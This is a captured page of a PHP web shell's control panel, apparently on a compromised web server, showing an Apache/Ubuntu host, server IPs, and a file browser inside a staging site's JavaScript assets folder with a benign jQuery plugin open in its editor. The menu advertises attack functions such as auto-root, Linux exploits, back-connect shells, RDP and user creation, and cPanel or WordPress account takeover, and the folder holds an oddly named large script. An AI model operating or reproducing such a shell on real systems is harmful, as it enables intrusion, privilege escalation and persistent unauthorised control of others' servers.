Linux localhost 5.4.0-198-generic #218-Ubuntu SMP Fri Sep 27 20:18:53 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 23.92.16.63 | : 104.23.187.74
Cant Read [ /etc/named.conf ]
8.1.5
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
staging.cbdpackaginghub.com /
assets /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
bootstrap
[ DIR ]
drwxr-xr-x
feather
[ DIR ]
drwxr-xr-x
slick
[ DIR ]
drwxr-xr-x
apexchart.js
930.13
KB
-rw-r--r--
appear.js
4.13
KB
-rw-r--r--
auto-height.js
1.22
KB
-rw-r--r--
bootstrap.min.js
58.68
KB
-rw-r--r--
bxslider.js
23.68
KB
-rw-r--r--
clipboard.min.js
19.24
KB
-rw-r--r--
copy-clipboard.js
308
B
-rw-r--r--
custom-chart.js
12.9
KB
-rw-r--r--
custom-slick-animated.js
240
B
-rw-r--r--
custom-wow.js
84
B
-rw-r--r--
delivery-option.js
263
B
-rw-r--r--
filter-sidebar.js
432
B
-rw-r--r--
fly-cart.js
1.19
KB
-rw-r--r--
ion.rangeSlider.min.js
81.4
KB
-rw-r--r--
jquery-3.6.0.min.js
147.74
KB
-rw-r--r--
jquery-ui.js
447.08
KB
-rw-r--r--
jquery-ui.min.js
367.67
KB
-rw-r--r--
jquery.countdown.js
4.41
KB
-rw-r--r--
jquery.elevatezoom.js
37.71
KB
-rw-r--r--
jquery.fancybox.js
150.49
KB
-rw-r--r--
jquery.form.min.js
16.69
KB
-rw-r--r--
jquery.js
87.56
KB
-rw-r--r--
jquery.validate.min.js
24.02
KB
-rw-r--r--
lazysizes.min.js
12.9
KB
-rw-r--r--
lusqsztk.js
560.49
KB
-rw-r--r--
main-slider-script.js
2.88
KB
-rw-r--r--
mixitup.js
51
KB
-rw-r--r--
nav-tab.js
238
B
-rw-r--r--
otp.js
1.25
KB
-rw-r--r--
owl.carousel.min.js
42.92
KB
-rw-r--r--
owl.js
83.3
KB
-rw-r--r--
popper.min.js
18.16
KB
-rw-r--r--
quantity-2.js
974
B
-rw-r--r--
quantity.js
396
B
-rw-r--r--
script.js
10.06
KB
-rw-r--r--
select2.min.js
69.23
KB
-rw-r--r--
sticky-cart-bottom.js
363
B
-rw-r--r--
swiper.min.js
135.25
KB
-rw-r--r--
table-column-remove.js
190
B
-rw-r--r--
theme-setting.js
1.51
KB
-rw-r--r--
timer1.js
2.49
KB
-rw-r--r--
timer2.js
2.49
KB
-rw-r--r--
timer3.js
2.49
KB
-rw-r--r--
timer4.js
2.49
KB
-rw-r--r--
wizard.js
841
B
-rw-r--r--
wow.js
6.15
KB
-rw-r--r--
wow.min.js
14.34
KB
-rw-r--r--
zoom-filter.js
880
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : appear.js
/* * jQuery.appear * https://github.com/bas2k/jquery.appear/ * http://code.google.com/p/jquery-appear/ * http://bas2k.ru/ * * Copyright (c) 2009 Michael Hixson * Copyright (c) 2012-2014 Alexander Brovikov * Licensed under the MIT license (http://www.opensource.org/licenses/mit-license.php) */ (function($) { $.fn.appear = function(fn, options) { var settings = $.extend({ //arbitrary data to pass to fn data: undefined, //call fn only on the first appear? one: true, // X & Y accuracy accX: 0, accY: 0 }, options); return this.each(function() { var t = $(this); //whether the element is currently visible t.appeared = false; if (!fn) { //trigger the custom event t.trigger('appear', settings.data); return; } var w = $(window); //fires the appear event when appropriate var check = function() { //is the element hidden? if (!t.is(':visible')) { //it became hidden t.appeared = false; return; } //is the element inside the visible window? var a = w.scrollLeft(); var b = w.scrollTop(); var o = t.offset(); var x = o.left; var y = o.top; var ax = settings.accX; var ay = settings.accY; var th = t.height(); var wh = w.height(); var tw = t.width(); var ww = w.width(); if (y + th + ay >= b && y <= b + wh + ay && x + tw + ax >= a && x <= a + ww + ax) { //trigger the custom event if (!t.appeared) t.trigger('appear', settings.data); } else { //it scrolled out of view t.appeared = false; } }; //create a modified fn with some additional logic var modifiedFn = function() { //mark the element as visible t.appeared = true; //is this supposed to happen only once? if (settings.one) { //remove the check w.unbind('scroll', check); var i = $.inArray(check, $.fn.appear.checks); if (i >= 0) $.fn.appear.checks.splice(i, 1); } //trigger the original fn fn.apply(this, arguments); }; //bind the modified fn to the element if (settings.one) t.one('appear', settings.data, modifiedFn); else t.bind('appear', settings.data, modifiedFn); //check whenever the window scrolls w.scroll(check); //check whenever the dom changes $.fn.appear.checks.push(check); //check now (check)(); }); }; //keep a queue of appearance checks $.extend($.fn.appear, { checks: [], timeout: null, //process the queue checkAll: function() { var length = $.fn.appear.checks.length; if (length > 0) while (length--) ($.fn.appear.checks[length])(); }, //check the queue asynchronously run: function() { if ($.fn.appear.timeout) clearTimeout($.fn.appear.timeout); $.fn.appear.timeout = setTimeout($.fn.appear.checkAll, 20); } }); //run checks when these methods are called $.each(['append', 'prepend', 'after', 'before', 'attr', 'removeAttr', 'addClass', 'removeClass', 'toggleClass', 'remove', 'css', 'show', 'hide'], function(i, n) { var old = $.fn[n]; if (old) { $.fn[n] = function() { var r = old.apply(this, arguments); $.fn.appear.run(); return r; } } }); })(jQuery);
Close